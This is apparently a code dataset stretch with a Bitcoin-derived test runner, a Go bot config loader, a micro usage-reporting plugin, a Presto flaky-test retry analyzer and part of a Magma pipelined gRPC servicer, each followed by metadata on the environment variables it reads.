if not (enable_wallet and enable_utils and enable_bitcoind):
print("No functional tests to run. Wallet, utils, and oasisd must all be enabled")
print("Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the ALL_SCRIPTS list. Accept the name with or without .py extension.
tests = [re.sub("\.py$", "", t) + ".py" for t in tests]
test_list = []
for t in tests:
if t in ALL_SCRIPTS:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(BOLD[1], BOLD[0], t))
else:
# No individual tests have been specified.
# Run all base tests, and optionally run extended tests.
test_list = BASE_SCRIPTS
if args.extended:
# place the EXTENDED_SCRIPTS first since the three longest ones
# are there and the list is shorter
test_list = EXTENDED_SCRIPTS + test_list
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub("\.py$", "", t) + ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(BOLD[1], BOLD[0], exclude_test))
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script (with args removed) and exit.
parser.print_help()
subprocess.check_call([(config["environment"]["SRCDIR"] + '/test/functional/' + test_list[0].split()[0])] + ['-h'])
sys.exit(0)
check_script_list(config["environment"]["SRCDIR"])
check_script_prefixes()
if not args.keepcache:
shutil.rmtree("%s/test/cache" % config["environment"]["BUILDDIR"], ignore_errors=True)
run_tests(test_list,
config["environment"]["SRCDIR"],
config["environment"]["BUILDDIR"],
config["environment"]["EXEEXT"],
tmpdir,
args.jobs, args.coverage,
passon_args, args.combinedlogslen,
args.keepcache)
def run_tests(test_list, src_dir, build_dir, exeext, tmpdir, jobs=1, enable_coverage=False, args=[], combined_logs_len=0, keep_cache=False):
# Warn if oasisd is already running (unix only)
try:
if subprocess.check_output(["pidof", "oasisd"]) is not None:
print("%sWARNING!%s There is already a oasisd process running on this system. Tests may fail unexpectedly due to resource contention!" % (BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = "%s/test/cache" % build_dir
if os.path.isdir(cache_dir):
print("%sWARNING!%s There is a cache directory here: %s. If tests fail unexpectedly, try deleting the cache directory." % (BOLD[1], BOLD[0], cache_dir))
#Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = build_dir + '/src/oasisd' + exeext
os.environ["BITCOINCLI"] = build_dir + '/src/oasis-cli' + exeext
tests_dir = src_dir + '/test/functional/'
flags = ["--srcdir={}/src".format(build_dir)] + args
flags.append("--cachedir=%s" % cache_dir)
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug("Initializing coverage directory at %s" % coverage.dir)
else:
coverage = None
if len(test_list) > 1 and jobs > 1:
# Populate cache
# Send a ping message every 5 minutes to not get stalled on Travis.
import threading
pingTime = 5 * 60
stopTimer = False
def pingTravis():
if stopTimer:
return
print("- Creating cache in progress...")
sys.stdout.flush()
threading.Timer(pingTime, pingTravis).start()
if not keep_cache:
pingTravis()
try:
subprocess.check_output([tests_dir + 'create_cache.py'] + flags + ["--tmpdir=%s/cache" % tmpdir])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
finally:
stopTimer = True
#Run Tests
job_queue = TestHandler(jobs, tests_dir, tmpdir, test_list, flags)
time0 = time.time()
test_results = []
max_len_name = len(max(test_list, key=len))
test_count = len(test_list)
for i in range(test_count):
test_result, testdir, stdout, stderr = job_queue.get_next()
test_results.append(test_result)
done_str = "{}/{} - {}{}{}".format(i + 1, test_count, BOLD[1], test_result.name, BOLD[0])
if test_result.status == "Passed":
if stderr == "":
logging.debug("%s passed, Duration: %s s" % (done_str, test_result.time))
else:
logging.debug("%s passed (with warnings), Duration: %s s" % (done_str, test_result.time))
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
elif test_result.status == "Skipped":
logging.debug("%s skipped" % (done_str))
else:
print("%s failed, Duration: %s s\n" % (done_str, test_result.time))
print(BOLD[1] + 'stdout:\n' + BOLD[0] + stdout + '\n')
print(BOLD[1] + 'stderr:\n' + BOLD[0] + stderr + '\n')
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([os.path.join(tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
print_results(test_results, max_len_name, (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def print_results(test_results, max_len_name, runtime):
results = "\n" + BOLD[1] + "%s | %s | %s\n\n" % ("TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=lambda result: result.name.lower())
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
status = TICK + "Passed" if all_passed else CROSS + "Failed"
results += BOLD[1] + "\n%s | %s | %s s (accumulated) \n" % ("ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
results += "Runtime: %s s\n" % (runtime)
print(results)
class TestHandler:
"""
Trigger the test scripts passed in via the list.
"""
def __init__(self, num_tests_parallel, tests_dir, tmpdir, test_list=None, flags=None):
assert(num_tests_parallel >= 1)
self.num_jobs = num_tests_parallel
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_list = test_list
self.flags = flags
self.num_running = 0
# In case there is a graveyard of zombie oasisds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
self.portseed_offset = int(time.time() * 1000) % 625
self.jobs = []
def get_next(self):
while self.num_running < self.num_jobs and self.test_list:
# Add tests
self.num_running += 1
t = self.test_list.pop(0)
portseed = len(self.test_list) + self.portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = "{}/{}_{}".format(self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
self.jobs.append((t,
time.time(),
subprocess.Popen([self.tests_dir + test_argv[0]] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr),
testdir,
log_stdout,
log_stderr))
if not self.jobs:
raise IndexError('pop from empty list')
# Print remaining running jobs when all jobs have been started.
if not self.test_list:
print("Remaining jobs: [{}]".format(", ".join(j[0] for j in self.jobs)))
dot_count = 0
while True:
# Return first proc that finishes
time.sleep(.5)
for j in self.jobs:
(name, time0, proc, testdir, log_out, log_err) = j
if os.getenv('TRAVIS') == 'true' and int(time.time() - time0) > 20 * 60:
# In travis, timeout individual tests after 20 minutes (to stop tests hanging and not
# providing useful output.
proc.send_signal(signal.SIGINT)
if proc.poll() is not None:
log_out.seek(0), log_err.seek(0)
[stdout, stderr] = [l.read().decode('utf-8') for l in (log_out, log_err)]
log_out.close(), log_err.close()
if proc.returncode == TEST_EXIT_PASSED:
status = "Passed"
elif proc.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
self.num_running -= 1
self.jobs.remove(j)
clearline = '\r' + (' ' * dot_count) + '\r'
print(clearline, end='', flush=True)
dot_count = 0
return TestResult(name, status, int(time.time() - time0)), testdir, stdout, stderr
print('.', end='', flush=True)
dot_count += 1
class TestResult():
def __init__(self, name, status, time):
self.name = name
self.status = status
self.time = time
self.padding = 0
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "%s | %s%s | %s s\n" % (self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def check_script_prefixes():
"""Check that at most a handful of the
test scripts don't start with one of the allowed name prefixes."""
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 10
good_prefixes_re = re.compile("(example|feature|interface|mempool|mining|p2p|rpc|wallet|zerocoin)_")
bad_script_names = [script for script in ALL_SCRIPTS if good_prefixes_re.match(script) is None]
if len(bad_script_names) > 0:
print("INFO: %d tests not meeting naming conventions:" % (len(bad_script_names)))
print(" %s" % ("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= LEEWAY, "Too many tests not following naming convention! (%d found, maximum: %d)" % (len(bad_script_names), LEEWAY)
def check_script_list(src_dir):
"""Check scripts directory.
Check that there are no scripts in the functional tests directory which are
not being run by pull-tester.py."""
script_dir = src_dir + '/test/functional/'
python_files = set([t for t in os.listdir(script_dir) if t[-3:] == ".py"])
missed_tests = list(python_files - set(map(lambda x: x.split()[0], ALL_SCRIPTS + NON_SCRIPTS)))
if len(missed_tests) != 0:
print("%sWARNING!%s The following scripts are not being run: %s. Check the test lists in test_runner.py." % (BOLD[1], BOLD[0], str(missed_tests)))
if os.getenv('TRAVIS') == 'true':
# On travis this warning is an error to prevent merging incomplete commits into master
sys.exit(1)
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `oasis-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir=%s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
main()
|
[] |
[] |
[
"BITCOINCLI",
"TRAVIS",
"BITCOIND"
] |
[]
|
["BITCOINCLI", "TRAVIS", "BITCOIND"]
|
python
| 3 | 0 | |
config/config.go
|
package config
import (
"errors"
"fmt"
"io/ioutil"
"os"
"github.com/apex/log"
"github.com/apex/log/handlers/json"
"github.com/apex/log/handlers/text"
yaml "gopkg.in/yaml.v2"
)
var Conf Configurator
func init() {
Conf, _ = ParseFile(os.Getenv("KUBOT_CONFIG"))
}
func InitLogging(logFilename string, logLevel string) (*os.File, error) {
logFile, err := os.OpenFile(logFilename, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
if err == nil {
log.SetHandler(json.New(logFile))
} else {
log.WithError(err).WithField("logfile", logFilename).Error("Failed to create log file, using console instead")
log.SetHandler(text.New(os.Stdout))
}
log.SetLevelFromString(logLevel)
return logFile, err
}
type Config struct {
Environments []Environment `yaml:"environments"`
SlackToken string `yaml:"slackToken"`
Logging Logging `yaml:"logging"`
Commands []Command `yaml:"commands"`
CommandConfig map[string]string `yaml:"commandConfig"`
CommandPrefix string `yaml:"commandPrefix"`
Init []Command `yaml:"init"`
}
type Configurator interface {
HasAccess(id string, env string) bool
GetEnvironmentByChannel(ch string) (*Environment, error)
GetSlackToken() string
GetLogging() Logging
GetCommand(name string, product string) (*Command, error)
GetCommands() []string
GetCommandConfig() map[string]string
GetCommandPrefix() string
GetInit() []Command
}
type Command struct {
Name string `yaml:"name"`
Product string `yaml:"product"`
ChannelStdout bool `yaml:"channelStdout"`
Commands []Command `yaml:"commands"`
Args []string `yaml:"args"`
Config map[string]string `yaml:"config"`
}
type Logging struct {
File string `yaml:"file"`
Level string `yaml:"level"`
}
func ParseFile(f string) (Configurator, error) {
file, err := os.Open(f)
if err != nil {
return Config{}, err
}
input, err := ioutil.ReadAll(file)
if err != nil {
return Config{}, err
}
bytes := []byte(input)
config, err := Parse(bytes)
if err != nil {
return Config{}, err
}
log.WithField("path", f).WithField("environments", len(config.Environments)).Info("configuration file loaded")
return config, nil
}
func Parse(bs []byte) (Config, error) {
var config Config
err := yaml.Unmarshal(bs, &config)
return config, err
}
func (c Config) GetEnvironment(env string) (*Environment, error) {
for _, e := range c.Environments {
if e.Name == env {
return &e, nil
}
}
return nil, fmt.Errorf("Environment '%v' not found", env)
}
func (c Config) GetEnvironmentByChannel(ch string) (*Environment, error) {
for _, e := range c.Environments {
if e.Channel == ch {
return &e, nil
}
}
return nil, fmt.Errorf("Environment not found for channel: '%v'", ch)
}
func (c Config) GetSlackToken() string {
return c.SlackToken
}
func (c Config) GetLogging() Logging {
return c.Logging
}
func (c Config) HasAccess(user string, env string) bool {
e, err := c.GetEnvironment(env)
if err != nil {
return false
}
return e.ContainsUser(user)
}
func (c Config) GetCommands() []string {
commands := []string{}
for _, cmd := range c.Commands {
commands = append(commands, cmd.Name)
}
return commands
}
func (c Config) GetCommandConfig() map[string]string {
config := map[string]string{}
for k, v := range c.CommandConfig {
config[k] = v
}
return config
}
func (c Config) GetCommand(name string, product string) (*Command, error) {
for _, cmd := range c.Commands {
if cmd.Name == name && cmd.Product == product {
return &cmd, nil
}
}
for _, cmd := range c.Commands {
if cmd.Name == name && cmd.Product == "" {
return &cmd, nil
}
}
return nil, errors.New(fmt.Sprintf("command not found: %s", name))
}
func (c Config) GetCommandPrefix() string {
return c.CommandPrefix
}
func (c Config) GetInit() []Command {
return c.Init
}
|
[
"\"KUBOT_CONFIG\""
] |
[] |
[
"KUBOT_CONFIG"
] |
[]
|
["KUBOT_CONFIG"]
|
go
| 1 | 0 | |
cmd/usage/plugin.go
|
package usage
import (
"math/rand"
"net/http"
"os"
"sync/atomic"
"time"
"github.com/2637309949/micro/v3/plugin"
"github.com/2637309949/micro/v3/service/registry"
"github.com/2637309949/micro/v3/util/backoff"
"github.com/urfave/cli/v2"
)
func init() {
plugin.Register(Plugin())
}
func Plugin() plugin.Plugin {
var requests uint64
// create rand
source := rand.NewSource(time.Now().UnixNano())
r := rand.New(source)
return plugin.NewPlugin(
plugin.WithName("usage"),
plugin.WithInit(func(c *cli.Context) error {
// only do if enabled
if !c.Bool("report_usage") {
os.Setenv("MICRO_REPORT_USAGE", "false")
return nil
}
var service string
// set service name
if c.Args().Len() > 0 && len(c.Args().Get(0)) > 0 {
service = c.Args().Get(0)
}
// service subcommand
if service == "service" {
// set as the sub command
if v := c.Args().Get(1); len(v) > 0 {
service = v
}
}
// kick off the tracker
go func() {
// new report
u := New(service)
// initial publish in 30-60 seconds
d := 30 + r.Intn(30)
time.Sleep(time.Second * time.Duration(d))
for {
// get service list
s, _ := registry.ListServices()
// get requests
reqs := atomic.LoadUint64(&requests)
srvs := uint64(len(s))
// reset requests
atomic.StoreUint64(&requests, 0)
// set metrics
u.Metrics.Count["instances"] = uint64(1)
u.Metrics.Count["requests"] = reqs
u.Metrics.Count["services"] = srvs
// attempt to send report 3 times
for i := 1; i <= 3; i++ {
if err := Report(u); err != nil {
time.Sleep(backoff.Do(i * 2))
continue
}
break
}
// now sleep 24 hours
time.Sleep(time.Hour * 24)
}
}()
return nil
}),
plugin.WithHandler(func(h http.Handler) http.Handler {
// only enable if set
if v := os.Getenv("MICRO_REPORT_USAGE"); v == "false" {
return h
}
// return usage recorder
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
// count requests
atomic.AddUint64(&requests, 1)
// serve the request
h.ServeHTTP(w, r)
})
}),
)
}
|
[
"\"MICRO_REPORT_USAGE\""
] |
[] |
[
"MICRO_REPORT_USAGE"
] |
[]
|
["MICRO_REPORT_USAGE"]
|
go
| 1 | 0 | |
presto-testng-services/src/main/java/io/prestosql/testng/services/FlakyTestRetryAnalyzer.java
|
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.testng.services;
import com.google.common.annotations.VisibleForTesting;
import io.airlift.log.Logger;
import org.testng.IRetryAnalyzer;
import org.testng.ITestNGMethod;
import org.testng.ITestResult;
import javax.annotation.concurrent.GuardedBy;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Pattern;
import java.util.stream.Stream;
import static com.google.common.base.Throwables.getStackTraceAsString;
import static com.google.common.collect.ImmutableList.toImmutableList;
import static java.lang.Boolean.parseBoolean;
import static java.lang.String.format;
public class FlakyTestRetryAnalyzer
implements IRetryAnalyzer
{
private static final Logger log = Logger.get(FlakyTestRetryAnalyzer.class);
// This property exists so that flaky tests are retried on CI only by default but tests of retrying pass locally as well.
// TODO replace pom.xml property with explicit invocation of a testng runner (test suite with a test) and amend the retryer behavior on that level
private static final String ENABLED_SYSTEM_PROPERTY = "io.prestosql.testng.services.FlakyTestRetryAnalyzer.enabled";
@VisibleForTesting
static final int ALLOWED_RETRIES_COUNT = 2;
@GuardedBy("this")
private final Map<String, Long> retryCounter = new HashMap<>();
@Override
public boolean retry(ITestResult result)
{
if (result.isSuccess()) {
return false;
}
String enabledSystemPropertyValue = System.getProperty(ENABLED_SYSTEM_PROPERTY);
if (enabledSystemPropertyValue != null) {
if (!parseBoolean(enabledSystemPropertyValue)) {
log.info("not retrying; FlakyTestRetryAnalyzer explicitly disabled ('%s' property set to '%s')", ENABLED_SYSTEM_PROPERTY, enabledSystemPropertyValue);
return false;
}
}
// Enable retry on CI by default
if (System.getenv("CONTINUOUS_INTEGRATION") == null) {
log.info("not retrying; FlakyTestRetryAnalyzer not enabled as CONTINUOUS_INTEGRATION environment was not detected");
return false;
}
Method javaMethod = result.getMethod().getConstructorOrMethod().getMethod();
if (javaMethod == null) {
log.info("not retrying; cannot get java method");
return false;
}
Flaky annotation = javaMethod.getAnnotation(Flaky.class);
if (annotation == null) {
log.info("not retrying; @Flaky annotation not present");
return false;
}
if (result.getThrowable() == null) {
log.info("not retrying; throwable not present in result");
return false;
}
String stackTrace = getStackTraceAsString(result.getThrowable());
if (!Pattern.compile(annotation.match()).matcher(stackTrace).find()) {
log.warn("not retrying; stacktrace '%s' does not match pattern '%s'", stackTrace, annotation.match());
return false;
}
long retryCount;
ITestNGMethod method = result.getMethod();
synchronized (this) {
String name = getName(method, result.getParameters());
retryCount = retryCounter.getOrDefault(name, 0L);
retryCount++;
if (retryCount > ALLOWED_RETRIES_COUNT) {
return false;
}
retryCounter.put(name, retryCount);
}
log.warn(
result.getThrowable(),
"Test %s::%s attempt %s failed, retrying...,",
result.getTestClass().getName(),
method.getMethodName(),
retryCount);
return true;
}
private static String getName(ITestNGMethod method, Object[] parameters)
{
String actualTestClass = method.getTestClass().getName();
if (parameters.length != 0) {
return format(
"%s::%s(%s)",
actualTestClass,
method.getMethodName(),
String.join(",", Stream.of(parameters).map(Object::toString).collect(toImmutableList())));
}
return format("%s::%s", actualTestClass, method.getMethodName());
}
}
|
[
"\"CONTINUOUS_INTEGRATION\""
] |
[] |
[
"CONTINUOUS_INTEGRATION"
] |
[]
|
["CONTINUOUS_INTEGRATION"]
|
java
| 1 | 0 | |
lte/gateway/python/magma/pipelined/rpc_servicer.py
|
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import logging
import queue
from concurrent.futures import Future
from itertools import chain
from typing import List, Tuple
import grpc
from lte.protos import pipelined_pb2_grpc
from lte.protos.pipelined_pb2 import (
SetupFlowsResult,
RequestOriginType,
ActivateFlowsResult,
DeactivateFlowsResult,
FlowResponse,
RuleModResult,
SetupUEMacRequest,
SetupPolicyRequest,
SetupQuotaRequest,
ActivateFlowsRequest,
AllTableAssignments,
TableAssignment)
from lte.protos.policydb_pb2 import PolicyRule
from lte.protos.mobilityd_pb2 import IPAddress
from lte.protos.subscriberdb_pb2 import AggregatedMaximumBitrate
from magma.pipelined.app.dpi import DPIController
from magma.pipelined.app.enforcement import EnforcementController
from magma.pipelined.app.enforcement_stats import EnforcementStatsController
from magma.pipelined.app.ue_mac import UEMacAddressController
from magma.pipelined.app.ipfix import IPFIXController
from magma.pipelined.app.check_quota import CheckQuotaController
from magma.pipelined.app.vlan_learn import VlanLearnController
from magma.pipelined.app.tunnel_learn import TunnelLearnController
from magma.pipelined.policy_converters import convert_ipv4_str_to_ip_proto, \
convert_ipv6_bytes_to_ip_proto
from magma.pipelined.ipv6_prefix_store import get_ipv6_interface_id, get_ipv6_prefix
from magma.pipelined.metrics import (
ENFORCEMENT_STATS_RULE_INSTALL_FAIL,
ENFORCEMENT_RULE_INSTALL_FAIL,
)
grpc_msg_queue = queue.Queue()
class PipelinedRpcServicer(pipelined_pb2_grpc.PipelinedServicer):
"""
gRPC based server for Pipelined.
"""
def __init__(self, loop, gy_app, enforcer_app, enforcement_stats, dpi_app,
ue_mac_app, check_quota_app, ipfix_app, vlan_learn_app,
tunnel_learn_app, classifier_app, service_config, service_manager):
self._loop = loop
self._gy_app = gy_app
self._enforcer_app = enforcer_app
self._enforcement_stats = enforcement_stats
self._dpi_app = dpi_app
self._ue_mac_app = ue_mac_app
self._check_quota_app = check_quota_app
self._ipfix_app = ipfix_app
self._vlan_learn_app = vlan_learn_app
self._tunnel_learn_app = tunnel_learn_app
self._service_config = service_config
self._classifier_app = classifier_app
self._service_manager = service_manager
self._print_grpc_payload = os.environ.get('MAGMA_PRINT_GRPC_PAYLOAD')
if self._print_grpc_payload is None:
self._print_grpc_payload = \
service_config.get('magma_print_grpc_payload', False)
def add_to_server(self, server):
"""
Add the servicer to a gRPC server
"""
pipelined_pb2_grpc.add_PipelinedServicer_to_server(self, server)
# --------------------------
# Enforcement App
# --------------------------
def SetupPolicyFlows(self, request, context) -> SetupFlowsResult:
"""
Setup flows for all subscribers, used on pipelined restarts
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
for controller in [self._gy_app, self._enforcer_app,
self._enforcement_stats]:
ret = controller.is_ready_for_restart_recovery(request.epoch)
if ret != SetupFlowsResult.SUCCESS:
return SetupFlowsResult(result=ret)
fut = Future()
self._loop.call_soon_threadsafe(self._setup_flows,
request, fut)
return fut.result()
def _setup_flows(self, request: SetupPolicyRequest,
fut: 'Future[List[SetupFlowsResult]]'
) -> SetupFlowsResult:
gx_reqs = [req for req in request.requests
if req.request_origin.type == RequestOriginType.GX]
gy_reqs = [req for req in request.requests
if req.request_origin.type == RequestOriginType.GY]
enforcement_res = self._enforcer_app.handle_restart(gx_reqs)
# TODO check these results and aggregate
self._gy_app.handle_restart(gy_reqs)
self._enforcement_stats.handle_restart(gx_reqs)
fut.set_result(enforcement_res)
def ActivateFlows(self, request, context):
"""
Activate flows for a subscriber based on the pre-defined rules
"""
self._log_grpc_payload(request)
if not self._service_manager.is_app_enabled(
EnforcementController.APP_NAME):
context.set_code(grpc.StatusCode.UNAVAILABLE)
context.set_details('Service not enabled!')
return None
fut = Future() # type: Future[ActivateFlowsResult]
self._loop.call_soon_threadsafe(self._activate_flows, request, fut)
return fut.result()
def _update_ipv6_prefix_store(self, ipv6_addr: bytes):
ipv6_str = ipv6_addr.decode('utf-8')
interface = get_ipv6_interface_id(ipv6_str)
prefix = get_ipv6_prefix(ipv6_str)
self._service_manager.interface_to_prefix_mapper.save_prefix(
interface, prefix)
def _update_version(self, request: ActivateFlowsRequest, ipv4: IPAddress):
"""
Update version for a given subscriber and rule.
"""
for rule_id in request.rule_ids:
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ipv4, rule_id)
for rule in request.dynamic_rules:
self._service_manager.session_rule_version_mapper.update_version(
request.sid.id, ipv4, rule.id)
def _activate_flows(self, request: ActivateFlowsRequest,
fut: 'Future[ActivateFlowsResult]'
) -> None:
"""
Activate flows for ipv4 / ipv6 or both
CWF won't have an ip_addr passed
"""
ret = ActivateFlowsResult()
if self._service_config['setup_type'] == 'CWF' or request.ip_addr:
ipv4 = convert_ipv4_str_to_ip_proto(request.ip_addr)
if request.request_origin.type == RequestOriginType.GX:
ret_ipv4 = self._install_flows_gx(request, ipv4)
else:
ret_ipv4 = self._install_flows_gy(request, ipv4)
ret.static_rule_results.extend(ret_ipv4.static_rule_results)
ret.dynamic_rule_results.extend(ret_ipv4.dynamic_rule_results)
if request.ipv6_addr:
ipv6 = convert_ipv6_bytes_to_ip_proto(request.ipv6_addr)
self._update_ipv6_prefix_store(request.ipv6_addr)
if request.request_origin.type == RequestOriginType.GX:
ret_ipv6 = self._install_flows_gx(request, ipv6)
else:
ret_ipv6 = self._install_flows_gy(request, ipv6)
ret.static_rule_results.extend(ret_ipv6.static_rule_results)
ret.dynamic_rule_results.extend(ret_ipv6.dynamic_rule_results)
fut.set_result(ret)
def _install_flows_gx(self, request: ActivateFlowsRequest,
ip_address: IPAddress
) -> ActivateFlowsResult:
"""
Ensure that the RuleModResult is only successful if the flows are
successfully added in both the enforcer app and enforcement_stats.
Install enforcement_stats flows first because even if the enforcement
flow install fails after, no traffic will be directed to the
enforcement_stats flows.
"""
logging.debug('Activating GX flows for %s', request.sid.id)
self._update_version(request, ip_address)
# Install rules in enforcement stats
enforcement_stats_res = self._activate_rules_in_enforcement_stats(
request.sid.id, ip_address, request.apn_ambr, request.rule_ids,
request.dynamic_rules)
failed_static_rule_results, failed_dynamic_rule_results = \
_retrieve_failed_results(enforcement_stats_res)
# Do not install any rules that failed to install in enforcement_stats.
static_rule_ids = \
_filter_failed_static_rule_ids(request, failed_static_rule_results)
dynamic_rules = \
_filter_failed_dynamic_rules(request, failed_dynamic_rule_results)
enforcement_res = self._activate_rules_in_enforcement(
request.sid.id, ip_address, request.apn_ambr, static_rule_ids,
dynamic_rules)
# Include the failed rules from enforcement_stats in the response.
enforcement_res.static_rule_results.extend(failed_static_rule_results)
enforcement_res.dynamic_rule_results.extend(
failed_dynamic_rule_results)
return enforcement_res
def _install_flows_gy(self, request: ActivateFlowsRequest,
ip_address: IPAddress
) -> ActivateFlowsResult:
"""
Ensure that the RuleModResult is only successful if the flows are
successfully added in both the enforcer app and enforcement_stats.
Install enforcement_stats flows first because even if the enforcement
flow install fails after, no traffic will be directed to the
enforcement_stats flows.
"""
logging.debug('Activating GY flows for %s', request.sid.id)
self._update_version(request, ip_address)
# Install rules in enforcement stats
enforcement_stats_res = self._activate_rules_in_enforcement_stats(
request.sid.id, ip_address, request.apn_ambr, request.rule_ids,
request.dynamic_rules)
failed_static_rule_results, failed_dynamic_rule_results = \
_retrieve_failed_results(enforcement_stats_res)
# Do not install any rules that failed to install in enforcement_stats.
static_rule_ids = \
_filter_failed_static_rule_ids(request, failed_static_rule_results)
dynamic_rules = \
_filter_failed_dynamic_rules(request, failed_dynamic_rule_results)
gy_res = self._activate_rules_in_gy(request.sid.id, ip_address,
request.apn_ambr, static_rule_ids, dynamic_rules)
# Include the failed rules from enforcement_stats in the response.
gy_res.static_rule_results.extend(failed_static_rule_results)
gy_res.dynamic_rule_results.extend(failed_dynamic_rule_results)
return gy_res
def _activate_rules_in_enforcement_stats(self, imsi: str,
ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
if not self._service_manager.is_app_enabled(
EnforcementStatsController.APP_NAME):
return ActivateFlowsResult()
enforcement_stats_res = self._enforcement_stats.activate_rules(
imsi, ip_addr, apn_ambr, static_rule_ids, dynamic_rules)
_report_enforcement_stats_failures(enforcement_stats_res, imsi)
return enforcement_stats_res
def _activate_rules_in_enforcement(self, imsi: str, ip_addr: IPAddress,
apn_ambr: AggregatedMaximumBitrate,
static_rule_ids: List[str],
dynamic_rules: List[PolicyRule]
) -> ActivateFlowsResult:
# TODO: this will crash pipelined if called with both static rules
# and dynamic rules at the same time
enforcement_res = self._enforcer_app.activate_rules(
